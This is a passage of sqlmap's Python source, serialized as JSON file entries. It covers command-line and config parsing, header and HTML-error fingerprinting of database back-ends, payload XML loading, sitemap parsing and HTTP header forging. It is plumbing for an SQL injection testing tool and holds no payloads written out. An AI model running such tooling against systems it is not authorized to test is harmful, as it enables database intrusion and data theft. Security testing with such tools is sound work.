SystemExit\n            elif re.search(r\"\\A-\\w=.+\", argv[i]):\n                dataToStdout(\"[!] potentially miswritten (illegal '=') short option detected ('%s')\\n\" % argv[i])\n                raise SystemExit\n            elif re.search(r\"\\A-\\w{3,}\", argv[i]):\n                if argv[i].strip('-').split('=')[0] in (longOptions | longSwitches):\n                    argv[i] = \"-%s\" % argv[i]\n            elif argv[i] in IGNORED_OPTIONS:\n                argv[i] = \"\"\n            elif argv[i] in DEPRECATED_OPTIONS:\n                argv[i] = \"\"\n            elif argv[i].startswith(\"--data-raw\"):\n                argv[i] = argv[i].replace(\"--data-raw\", \"--data\", 1)\n            elif argv[i].startswith(\"--auth-creds\"):\n                argv[i] = argv[i].replace(\"--auth-creds\", \"--auth-cred\", 1)\n            elif argv[i].startswith(\"--drop-cookie\"):\n                argv[i] = argv[i].replace(\"--drop-cookie\", \"--drop-set-cookie\", 1)\n            elif any(argv[i].startswith(_) for _ in (\"--tamper\", \"--ignore-code\", \"--skip\")):\n                key = re.search(r\"\\-?\\-(\\w+)\\b\", argv[i]).group(1)\n                index = auxIndexes.get(key, None)\n                if index is None:\n                    index = i if '=' in argv[i] else (i + 1 if i + 1 < len(argv) and not argv[i + 1].startswith('-') else None)\n                    auxIndexes[key] = index\n                else:\n                    delimiter = ','\n                    argv[index] = \"%s%s%s\" % (argv[index], delimiter, argv[i].split('=')[1] if '=' in argv[i] else (argv[i + 1] if i + 1 < len(argv) and not argv[i + 1].startswith('-') else \"\"))\n                    argv[i] = \"\"\n            elif argv[i] in (\"-H\", \"--header\") or any(argv[i].startswith(\"%s=\" % _) for _ in (\"-H\", \"--header\")):\n                if '=' in argv[i]:\n                    extraHeaders.append(argv[i].split('=', 1)[1])\n                elif i + 1 < len(argv):\n                    extraHeaders.append(argv[i + 1])\n            elif argv[i] == \"--deps\":\n                argv[i] = \"--dependencies\"\n            elif argv[i] == \"--disable-colouring\":\n                argv[i] = \"--disable-coloring\"\n            elif argv[i] == \"-r\":\n                for j in xrange(i + 2, len(argv)):\n                    value = argv[j]\n                    if os.path.isfile(value):\n                        argv[i + 1] += \",%s\" % value\n                        argv[j] = ''\n                    else:\n                        break\n            elif re.match(r\"\\A\\d+!\\Z\", argv[i]) and argv[max(0, i - 1)] == \"--threads\" or re.match(r\"\\A--threads.+\\d+!\\Z\", argv[i]):\n                argv[i] = argv[i][:-1]\n                conf.skipThreadCheck = True\n            elif argv[i] == \"--version\":\n                print(VERSION_STRING.split('/')[-1])\n                raise SystemExit\n            elif argv[i] in (\"-h\", \"--help\"):\n                advancedHelp = False\n                for group in get_groups(parser)[:]:\n                    found = False\n                    for option in get_actions(group):\n                        if option.dest not in BASIC_HELP_ITEMS:\n                            option.help = SUPPRESS\n                        else:\n                            found = True\n                    if not found:\n                        get_groups(parser).remove(group)\n            elif '=' in argv[i] and not argv[i].startswith('-') and argv[i].split('=')[0] in longOptions and re.search(r\"\\A-{1,2}\\w\", argv[i - 1]) is None:\n                dataToStdout(\"[!] detected usage of long-option without a starting hyphen ('%s')\\n\" % argv[i])\n                raise SystemExit\n\n        for verbosity in (_ for _ in argv if re.search(r\"\\A\\-v+\\Z\", _)):\n            try:\n                if argv.index(verbosity) == len(argv) - 1 or not argv[argv.index(verbosity) + 1].isdigit():\n                    conf.verbose = verbosity.count('v')\n                    del argv[argv.index(verbosity)]\n            except (IndexError, ValueError):\n                pass\n\n        try:\n            (args, _) = parser.parse_known_args(argv) if hasattr(parser, \"parse_known_args\") else parser.parse_args(argv)\n        except UnicodeEncodeError as ex:\n            dataToStdout(\"\\n[!] %s\\n\" % getUnicode(ex.object.encode(\"unicode-escape\")))\n            raise SystemExit\n        except SystemExit:\n            if \"-h\" in argv and not advancedHelp:\n                dataToStdout(\"\\n[!] to see full list of options run with '-hh'\\n\")\n            raise\n\n        if extraHeaders:\n            if not args.headers:\n                args.headers = \"\"\n            delimiter = \"\\\\n\" if \"\\\\n\" in args.headers else \"\\n\"\n            args.headers += delimiter + delimiter.join(extraHeaders)\n\n        # Expand given mnemonic options (e.g. -z \"ign,flu,bat\")\n        for i in xrange(len(argv) - 1):\n            if argv[i] == \"-z\":\n                expandMnemonics(argv[i + 1], parser, args)\n\n        if args.dummy:\n            args.url = args.url or DUMMY_URL\n\n        if hasattr(sys.stdin, \"fileno\") and not any((os.isatty(sys.stdin.fileno()), args.api, args.ignoreStdin, \"GITHUB_ACTIONS\" in os.environ)):\n            args.stdinPipe = iter(sys.stdin.readline, None)\n        else:\n            args.stdinPipe = None\n\n        if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.vulnTest, args.wizard, args.dependencies, args.purge, args.listTampers, args.hashFile, args.stdinPipe)):\n            errMsg = \"missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). \"\n            errMsg += \"Use -h for basic and -hh for advanced help\\n\"\n            parser.error(errMsg)\n\n        return args\n\n    except (ArgumentError, TypeError) as ex:\n        parser.error(ex)\n\n    except SystemExit:\n        # Protection against Windows dummy double clicking\n        if IS_WIN and \"--non-interactive\" not in sys.argv:\n            dataToStdout(\"\\nPress Enter to continue...\")\n            _input()\n        raise\n\n    debugMsg = \"parsing command line\"\n    logger.debug(debugMsg)\n"
  },
  {
    "path": "sqlmap/lib/parse/configfile.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import checkFile\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import openFile\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import UnicodeRawConfigParser\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import cmdLineOptions\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.enums import OPTION_TYPE\nfrom lib.core.exception import SqlmapMissingMandatoryOptionException\nfrom lib.core.exception import SqlmapSyntaxException\nfrom lib.core.optiondict import optDict\n\nconfig = None\n\ndef configFileProxy(section, option, datatype):\n    \"\"\"\n    Parse configuration file and save settings into the configuration\n    advanced dictionary.\n    \"\"\"\n\n    if config.has_option(section, option):\n        try:\n            if datatype == OPTION_TYPE.BOOLEAN:\n                value = config.getboolean(section, option) if config.get(section, option) else False\n            elif datatype == OPTION_TYPE.INTEGER:\n                value = config.getint(section, option) if config.get(section, option) else 0\n            elif datatype == OPTION_TYPE.FLOAT:\n                value = config.getfloat(section, option) if config.get(section, option) else 0.0\n            else:\n                value = config.get(section, option)\n        except ValueError as ex:\n            errMsg = \"error occurred while processing the option \"\n            errMsg += \"'%s' in provided configuration file ('%s')\" % (option, getUnicode(ex))\n            raise SqlmapSyntaxException(errMsg)\n\n        if value:\n            conf[option] = value\n        else:\n            conf[option] = None\n    else:\n        debugMsg = \"missing requested option '%s' (section \" % option\n        debugMsg += \"'%s') into the configuration file, \" % section\n        debugMsg += \"ignoring. Skipping to next.\"\n        logger.debug(debugMsg)\n\ndef configFileParser(configFile):\n    \"\"\"\n    Parse configuration file and save settings into the configuration\n    advanced dictionary.\n    \"\"\"\n\n    global config\n\n    debugMsg = \"parsing configuration file\"\n    logger.debug(debugMsg)\n\n    checkFile(configFile)\n    configFP = openFile(configFile, \"rb\")\n\n    try:\n        config = UnicodeRawConfigParser()\n        config.readfp(configFP)\n    except Exception as ex:\n        errMsg = \"you have provided an invalid and/or unreadable configuration file ('%s')\" % getSafeExString(ex)\n        raise SqlmapSyntaxException(errMsg)\n\n    if not config.has_section(\"Target\"):\n        errMsg = \"missing a mandatory section 'Target' in the configuration file\"\n        raise SqlmapMissingMandatoryOptionException(errMsg)\n\n    mandatory = False\n\n    for option in (\"direct\", \"url\", \"logFile\", \"bulkFile\", \"googleDork\", \"requestFile\", \"wizard\"):\n        if config.has_option(\"Target\", option) and config.get(\"Target\", option) or cmdLineOptions.get(option):\n            mandatory = True\n            break\n\n    if not mandatory:\n        errMsg = \"missing a mandatory option in the configuration file \"\n        errMsg += \"(direct, url, logFile, bulkFile, googleDork, requestFile or wizard)\"\n        raise SqlmapMissingMandatoryOptionException(errMsg)\n\n    for family, optionData in optDict.items():\n        for option, datatype in optionData.items():\n            datatype = unArrayizeValue(datatype)\n            configFileProxy(family, option, datatype)\n"
  },
  {
    "path": "sqlmap/lib/parse/handler.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom xml.sax.handler import ContentHandler\n\nfrom lib.core.common import sanitizeStr\n\nclass FingerprintHandler(ContentHandler):\n    \"\"\"\n    This class defines methods to parse and extract information from\n    the given DBMS banner based upon the data in XML file\n    \"\"\"\n\n    def __init__(self, banner, info):\n        ContentHandler.__init__(self)\n\n        self._banner = sanitizeStr(banner or \"\")\n        self._regexp = None\n        self._match = None\n        self._dbmsVersion = None\n        self._techVersion = None\n        self._info = info\n\n    def _feedInfo(self, key, value):\n        value = sanitizeStr(value)\n\n        if value in (None, \"None\", \"\"):\n            return\n\n        if key == \"dbmsVersion\":\n            self._info[key] = value\n        else:\n            if key not in self._info:\n                self._info[key] = set()\n\n            for _ in value.split(\"|\"):\n                self._info[key].add(_)\n\n    def startElement(self, name, attrs):\n        if name == \"regexp\":\n            self._regexp = sanitizeStr(attrs.get(\"value\"))\n            _ = re.match(r\"\\A[A-Za-z0-9]+\", self._regexp)  # minor trick avoiding compiling of large amount of regexes\n\n            if _ and self._banner and _.group(0).lower() in self._banner.lower() or not _:\n                self._match = re.search(self._regexp, self._banner, re.I | re.M)\n            else:\n                self._match = None\n\n        if name == \"info\" and self._match:\n            self._feedInfo(\"type\", attrs.get(\"type\"))\n            self._feedInfo(\"distrib\", attrs.get(\"distrib\"))\n            self._feedInfo(\"release\", attrs.get(\"release\"))\n            self._feedInfo(\"codename\", attrs.get(\"codename\"))\n\n            self._dbmsVersion = sanitizeStr(attrs.get(\"dbms_version\"))\n            self._techVersion = sanitizeStr(attrs.get(\"tech_version\"))\n            self._sp = sanitizeStr(attrs.get(\"sp\"))\n\n            if self._dbmsVersion and self._dbmsVersion.isdigit():\n                self._feedInfo(\"dbmsVersion\", self._match.group(int(self._dbmsVersion)))\n\n            if self._techVersion and self._techVersion.isdigit():\n                self._feedInfo(\"technology\", \"%s %s\" % (attrs.get(\"technology\"), self._match.group(int(self._techVersion))))\n            else:\n                self._feedInfo(\"technology\", attrs.get(\"technology\"))\n\n            if self._sp.isdigit():\n                self._feedInfo(\"sp\", \"Service Pack %s\" % int(self._sp))\n\n            self._regexp = None\n            self._match = None\n            self._dbmsVersion = None\n            self._techVersion = None\n"
  },
  {
    "path": "sqlmap/lib/parse/headers.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.common import parseXmlFile\nfrom lib.core.data import kb\nfrom lib.core.data import paths\nfrom lib.parse.handler import FingerprintHandler\n\ndef headersParser(headers):\n    \"\"\"\n    This function calls a class that parses the input HTTP headers to\n    fingerprint the back-end database management system operating system\n    and the web application technology\n    \"\"\"\n\n    if not kb.headerPaths:\n        kb.headerPaths = {\n            \"microsoftsharepointteamservices\": os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"sharepoint.xml\"),\n            \"server\": os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"server.xml\"),\n            \"servlet-engine\": os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"servlet-engine.xml\"),\n            \"set-cookie\": os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"set-cookie.xml\"),\n            \"x-aspnet-version\": os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"x-aspnet-version.xml\"),\n            \"x-powered-by\": os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"x-powered-by.xml\"),\n        }\n\n    for header in (_.lower() for _ in headers if _.lower() in kb.headerPaths):\n        value = headers[header]\n        xmlfile = kb.headerPaths[header]\n        handler = FingerprintHandler(value, kb.headersFp)\n        parseXmlFile(xmlfile, handler)\n        parseXmlFile(paths.GENERIC_XML, handler)\n"
  },
  {
    "path": "sqlmap/lib/parse/html.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom xml.sax.handler import ContentHandler\n\nfrom lib.core.common import urldecode\nfrom lib.core.common import parseXmlFile\nfrom lib.core.data import kb\nfrom lib.core.data import paths\nfrom lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD\nfrom lib.core.threads import getCurrentThreadData\n\nclass HTMLHandler(ContentHandler):\n    \"\"\"\n    This class defines methods to parse the input HTML page to\n    fingerprint the back-end database management system\n    \"\"\"\n\n    def __init__(self, page):\n        ContentHandler.__init__(self)\n\n        self._dbms = None\n        self._page = (page or \"\")\n        try:\n            self._lower_page = self._page.lower()\n        except SystemError:  # https://bugs.python.org/issue18183\n            self._lower_page = None\n        self._urldecoded_page = urldecode(self._page)\n\n        self.dbms = None\n\n    def _markAsErrorPage(self):\n        threadData = getCurrentThreadData()\n        threadData.lastErrorPage = (threadData.lastRequestUID, self._page)\n\n    def startElement(self, name, attrs):\n        if self.dbms:\n            return\n\n        if name == \"dbms\":\n            self._dbms = attrs.get(\"value\")\n\n        elif name == \"error\":\n            regexp = attrs.get(\"regexp\")\n            if regexp not in kb.cache.regex:\n                keywords = re.findall(r\"\\w+\", re.sub(r\"\\\\.\", \" \", regexp))\n                keywords = sorted(keywords, key=len)\n                kb.cache.regex[regexp] = keywords[-1].lower()\n\n            if ('|' in regexp or kb.cache.regex[regexp] in (self._lower_page or kb.cache.regex[regexp])) and re.search(regexp, self._urldecoded_page, re.I):\n                self.dbms = self._dbms\n                self._markAsErrorPage()\n                kb.forkNote = kb.forkNote or attrs.get(\"fork\")\n\ndef htmlParser(page):\n    \"\"\"\n    This function calls a class that parses the input HTML page to\n    fingerprint the back-end database management system\n\n    >>> from lib.core.enums import DBMS\n    >>> htmlParser(\"Warning: mysql_fetch_array() expects parameter 1 to be resource\") == DBMS.MYSQL\n    True\n    >>> threadData = getCurrentThreadData()\n    >>> threadData.lastErrorPage = None\n    \"\"\"\n\n    page = page[:HEURISTIC_PAGE_SIZE_THRESHOLD]\n\n    xmlfile = paths.ERRORS_XML\n    handler = HTMLHandler(page)\n    key = hash(page)\n\n    # generic SQL warning/error messages\n    if re.search(r\"SQL (warning|error|syntax)\", page, re.I):\n        handler._markAsErrorPage()\n\n    if key in kb.cache.parsedDbms:\n        retVal = kb.cache.parsedDbms[key]\n        if retVal:\n            handler._markAsErrorPage()\n        return retVal\n\n    parseXmlFile(xmlfile, handler)\n\n    if handler.dbms and handler.dbms not in kb.htmlFp:\n        kb.lastParserStatus = handler.dbms\n        kb.htmlFp.append(handler.dbms)\n    else:\n        kb.lastParserStatus = None\n\n    kb.cache.parsedDbms[key] = handler.dbms\n\n    return handler.dbms\n"
  },
  {
    "path": "sqlmap/lib/parse/payloads.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom xml.etree import ElementTree as et\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import paths\nfrom lib.core.datatype import AttribDict\nfrom lib.core.exception import SqlmapInstallationException\nfrom lib.core.settings import PAYLOAD_XML_FILES\n\ndef cleanupVals(text, tag):\n    if tag == \"clause\" and '-' in text:\n        text = re.sub(r\"(\\d+)-(\\d+)\", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text)\n\n    if tag in (\"clause\", \"where\"):\n        text = text.split(',')\n\n    if hasattr(text, \"isdigit\") and text.isdigit():\n        text = int(text)\n\n    elif isinstance(text, list):\n        count = 0\n\n        for _ in text:\n            text[count] = int(_) if _.isdigit() else _\n            count += 1\n\n        if len(text) == 1 and tag not in (\"clause\", \"where\"):\n            text = text[0]\n\n    return text\n\ndef parseXmlNode(node):\n    for element in node.findall(\"boundary\"):\n        boundary = AttribDict()\n\n        for child in element:\n            if child.text:\n                values = cleanupVals(child.text, child.tag)\n                boundary[child.tag] = values\n            else:\n                boundary[child.tag] = None\n\n        conf.boundaries.append(boundary)\n\n    for element in node.findall(\"test\"):\n        test = AttribDict()\n\n        for child in element:\n            if child.text and child.text.strip():\n                values = cleanupVals(child.text, child.tag)\n                test[child.tag] = values\n            else:\n                if len(child.findall(\"*\")) == 0:\n                    test[child.tag] = None\n                    continue\n                else:\n                    test[child.tag] = AttribDict()\n\n                for gchild in child:\n                    if gchild.tag in test[child.tag]:\n                        prevtext = test[child.tag][gchild.tag]\n                        test[child.tag][gchild.tag] = [prevtext, gchild.text]\n                    else:\n                        test[child.tag][gchild.tag] = gchild.text\n\n        conf.tests.append(test)\n\ndef loadBoundaries():\n    \"\"\"\n    Loads boundaries from XML\n\n    >>> conf.boundaries = []\n    >>> loadBoundaries()\n    >>> len(conf.boundaries) > 0\n    True\n    \"\"\"\n\n    try:\n        doc = et.parse(paths.BOUNDARIES_XML)\n    except Exception as ex:\n        errMsg = \"something appears to be wrong with \"\n        errMsg += \"the file '%s' ('%s'). Please make \" % (paths.BOUNDARIES_XML, getSafeExString(ex))\n        errMsg += \"sure that you haven't made any changes to it\"\n        raise SqlmapInstallationException(errMsg)\n\n    root = doc.getroot()\n    parseXmlNode(root)\n\ndef loadPayloads():\n    \"\"\"\n    Loads payloads/tests from XML\n\n    >>> conf.tests = []\n    >>> loadPayloads()\n    >>> len(conf.tests) > 0\n    True\n    \"\"\"\n\n    for payloadFile in PAYLOAD_XML_FILES:\n        payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)\n\n        try:\n            doc = et.parse(payloadFilePath)\n        except Exception as ex:\n            errMsg = \"something appears to be wrong with \"\n            errMsg += \"the file '%s' ('%s'). Please make \" % (payloadFilePath, getSafeExString(ex))\n            errMsg += \"sure that you haven't made any changes to it\"\n            raise SqlmapInstallationException(errMsg)\n\n        root = doc.getroot()\n        parseXmlNode(root)\n"
  },
  {
    "path": "sqlmap/lib/parse/sitemap.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import readInput\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.datatype import OrderedSet\nfrom lib.core.exception import SqlmapSyntaxException\nfrom lib.request.connect import Connect as Request\nfrom thirdparty.six.moves import http_client as _http_client\n\nabortedFlag = None\n\ndef parseSitemap(url, retVal=None):\n    global abortedFlag\n\n    if retVal is not None:\n        logger.debug(\"parsing sitemap '%s'\" % url)\n\n    try:\n        if retVal is None:\n            abortedFlag = False\n            retVal = OrderedSet()\n\n        try:\n            content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else \"\"\n        except _http_client.InvalidURL:\n            errMsg = \"invalid URL given for sitemap ('%s')\" % url\n            raise SqlmapSyntaxException(errMsg)\n\n        for match in re.finditer(r\"<loc>\\s*([^<]+)\", content or \"\"):\n            if abortedFlag:\n                break\n            url = match.group(1).strip()\n            if url.endswith(\".xml\") and \"sitemap\" in url.lower():\n                if kb.followSitemapRecursion is None:\n                    message = \"sitemap recursion detected. Do you want to follow? [y/N] \"\n                    kb.followSitemapRecursion = readInput(message, default='N', boolean=True)\n                if kb.followSitemapRecursion:\n                    parseSitemap(url, retVal)\n            else:\n                retVal.add(url)\n\n    except KeyboardInterrupt:\n        abortedFlag = True\n        warnMsg = \"user aborted during sitemap parsing. sqlmap \"\n        warnMsg += \"will use partial list\"\n        logger.warning(warnMsg)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/lib/request/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/request/basic.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport codecs\nimport gzip\nimport io\nimport logging\nimport re\nimport struct\nimport zlib\n\nfrom lib.core.common import Backend\nfrom lib.core.common import extractErrorMessage\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import filterNone\nfrom lib.core.common import getPublicTypeMembers\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import isListLike\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import resetCookieJar\nfrom lib.core.common import singleTimeLogMessage\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.convert import decodeHex\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getText\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.decorators import cachedmethod\nfrom lib.core.decorators import lockedmethod\nfrom lib.core.dicts import HTML_ENTITIES\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import PLACE\nfrom lib.core.exception import SqlmapCompressionException\nfrom lib.core.settings import BLOCKED_IP_REGEX\nfrom lib.core.settings import DEFAULT_COOKIE_DELIMITER\nfrom lib.core.settings import EVENTVALIDATION_REGEX\nfrom lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD\nfrom lib.core.settings import IDENTYWAF_PARSE_LIMIT\nfrom lib.core.settings import MAX_CONNECTION_TOTAL_SIZE\nfrom lib.core.settings import META_CHARSET_REGEX\nfrom lib.core.settings import PARSE_HEADERS_LIMIT\nfrom lib.core.settings import PRINTABLE_BYTES\nfrom lib.core.settings import SELECT_FROM_TABLE_REGEX\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.settings import VIEWSTATE_REGEX\nfrom lib.parse.headers import headersParser\nfrom lib.parse.html import htmlParser\nfrom thirdparty import six\nfrom thirdparty.chardet import detect\nfrom thirdparty.identywaf import identYwaf\nfrom thirdparty.odict import OrderedDict\nfrom thirdparty.six import unichr as _unichr\nfrom thirdparty.six.moves import http_client as _http_client\n\n@lockedmethod\ndef forgeHeaders(items=None, base=None):\n    \"\"\"\n    Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing\n    the HTTP requests\n    \"\"\"\n\n    items = items or {}\n\n    for _ in list(items.keys()):\n        if items[_] is None:\n            del items[_]\n\n    headers = OrderedDict(conf.httpHeaders if base is None else base)\n    headers.update(items.items())\n\n    class _str(str):\n        def capitalize(self):\n            return _str(self)\n\n        def title(self):\n            return _str(self)\n\n    _ = headers\n    headers = OrderedDict()\n    for key, value in _.items():\n        success = False\n\n        for _ in headers:\n            if _.upper() == key.upper():\n                del headers[_]\n                break\n\n        if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):\n            try:\n                headers[_str(key)] = value  # dirty hack for http://bugs.python.org/issue12455\n            except UnicodeEncodeError:      # don't do the hack on non-ASCII header names (they have to be properly encoded later on)\n                pass\n            else:\n                success = True\n        if not success:\n            key = '-'.join(_.capitalize() for _ in key.split('-'))\n            headers[key] = value\n\n    if conf.cj:\n        if HTTP_HEADER.COOKIE in headers:\n            for cookie in conf.cj:\n                if cookie.domain_specified and not (conf.hostname or \"\").endswith(cookie.domain):\n                    continue\n\n                if (\"%s=\" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]):\n                    if conf.loadCookies:\n                        conf.httpHeaders = filterNone((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders)\n                    elif kb.mergeCookies is None:\n                        message = \"you provided a HTTP %s header value, while \" % HTTP_HEADER.COOKIE\n                        message += \"target URL provides its own cookies within \"\n                        message += \"HTTP %s header which intersect with yours. \" % HTTP_HEADER.SET_COOKIE\n                        message += \"Do you want to merge them in further requests? [Y/n] \"\n\n                        kb.mergeCookies = readInput(message, default='Y', boolean=True)\n\n                    if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:\n                        def _(value):\n                            return re.sub(r\"(?i)\\b%s=[^%s]+\" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), (\"%s=%s\" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\\\', r'\\\\'), value)\n\n                        headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])\n\n                        if PLACE.COOKIE in conf.parameters:\n                            conf.parameters[PLACE.COOKIE] = _(conf.parameters[PLACE.COOKIE])\n\n                        conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders]\n\n                elif not kb.testMode:\n                    headers[HTTP_HEADER.COOKIE] += \"%s %s=%s\" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, getUnicode(cookie.name), getUnicode(cookie.value))\n\n        if kb.testMode and not any((conf.csrfToken, conf.safeUrl)):\n            resetCookieJar(conf.cj)\n\n    return headers\n\ndef parseResponse(page, headers, status=None):\n    \"\"\"\n    @param page: the page to parse to feed the knowledge base htmlFp\n    (back-end DBMS fingerprint based upon DBMS error messages return\n    through the web application) list and absFilePaths (absolute file\n    paths) set.\n    \"\"\"\n\n    if headers:\n        headersParser(headers)\n\n    if page:\n        htmlParser(page if not status else \"%s\\n\\n%s\" % (status, page))\n\n@cachedmethod\ndef checkCharEncoding(encoding, warn=True):\n    \"\"\"\n    Checks encoding name, repairs common misspellings and adjusts to\n    proper namings used in codecs module\n\n    >>> checkCharEncoding('iso-8858', False)\n    'iso8859-1'\n    >>> checkCharEncoding('en_us', False)\n    'utf8'\n    \"\"\"\n\n    if isinstance(encoding, six.binary_type):\n        encoding = getUnicode(encoding)\n\n    if isListLike(encoding):\n        encoding = unArrayizeValue(encoding)\n\n    if encoding:\n        encoding = encoding.lower()\n    else:\n        return encoding\n\n    # Reference: http://www.destructor.de/charsets/index.htm\n    translate = {\"windows-874\": \"iso-8859-11\", \"utf-8859-1\": \"utf8\", \"en_us\": \"utf8\", \"macintosh\": \"iso-8859-1\", \"euc_tw\": \"big5_tw\", \"th\": \"tis-620\", \"unicode\": \"utf8\", \"utc8\": \"utf8\", \"ebcdic\": \"ebcdic-cp-be\", \"iso-8859\": \"iso8859-1\", \"iso-8859-0\": \"iso8859-1\", \"ansi\": \"ascii\", \"gbk2312\": \"gbk\", \"windows-31j\": \"cp932\", \"en\": \"us\"}\n\n    for delimiter in (';', ',', '('):\n        if delimiter in encoding:\n            encoding = encoding[:encoding.find(delimiter)].strip()\n\n    encoding = encoding.replace(\"&quot\", \"\")\n\n    # popular typos/errors\n    if \"8858\" in encoding:\n        encoding = encoding.replace(\"8858\", \"8859\")  # iso-8858 -> iso-8859\n    elif \"8559\" in encoding:\n        encoding = encoding.replace(\"8559\", \"8859\")  # iso-8559 -> iso-8859\n    elif \"8895\" in encoding:\n        encoding = encoding.replace(\"8895\", \"8859\")  # iso-8895 -> iso-8859\n    elif \"5889\" in encoding:\n        encoding = encoding.replace(\"5889\", \"8859\")  # iso-5889 -> iso-8859\n    elif \"5589\" in encoding:\n        encoding = encoding.replace(\"5589\", \"8859\")  # iso-5589 -> iso-8859\n    elif \"2313\" in encoding:\n        encoding = encoding.replace(\"2313\", \"2312\")  # gb2313 -> gb2312\n    elif encoding.startswith(\"x-\"):\n        encoding = encoding[len(\"x-\"):]              # x-euc-kr -> euc-kr  /  x-mac-turkish -> mac-turkish\n    elif \"windows-cp\" in encoding:\n        encoding = encoding.replace(\"windows-cp\", \"windows\")  # windows-cp-1254 -> windows-1254\n\n    # name adjustment for compatibility\n    if encoding.startswith(\"8859\"):\n        encoding = \"iso-%s\" % encoding\n    elif encoding.startswith(\"cp-\"):\n        encoding = \"cp%s\" % encoding[3:]\n    elif encoding.startswith(\"euc-\"):\n        encoding = \"euc_%s\" % encoding[4:]\n    elif encoding.startswith(\"windows\") and not encoding.startswith(\"windows-\"):\n        encoding = \"windows-%s\" % encoding[7:]\n    elif encoding.find(\"iso-88\") > 0:\n        encoding = encoding[encoding.find(\"iso-88\"):]\n    elif encoding.startswith(\"is0-\"):\n        encoding = \"iso%s\" % encoding[4:]\n    elif encoding.find(\"ascii\") > 0:\n        encoding = \"ascii\"\n    elif encoding.find(\"utf8\") > 0:\n        encoding = \"utf8\"\n    elif encoding.find(\"utf-8\") > 0:\n        encoding = \"utf-8\"\n\n    # Reference: http://philip.html5.org/data/charsets-2.html\n    if encoding in translate:\n        encoding = translate[encoding]\n    elif encoding in (\"null\", \"{charset}\", \"charset\", \"*\") or not re.search(r\"\\w\", encoding):\n        return None\n\n    # Reference: http://www.iana.org/assignments/character-sets\n    # Reference: http://docs.python.org/library/codecs.html\n    try:\n        codecs.lookup(encoding)\n    except:\n        encoding = None\n\n    if encoding:\n        try:\n            six.text_type(getBytes(randomStr()), encoding)\n        except:\n            if warn:\n                warnMsg = \"invalid web page charset '%s'\" % encoding\n                singleTimeLogMessage(warnMsg, logging.WARN, encoding)\n            encoding = None\n\n    return encoding\n\ndef getHeuristicCharEncoding(page):\n    \"\"\"\n    Returns page encoding charset detected by usage of heuristics\n\n    Reference: 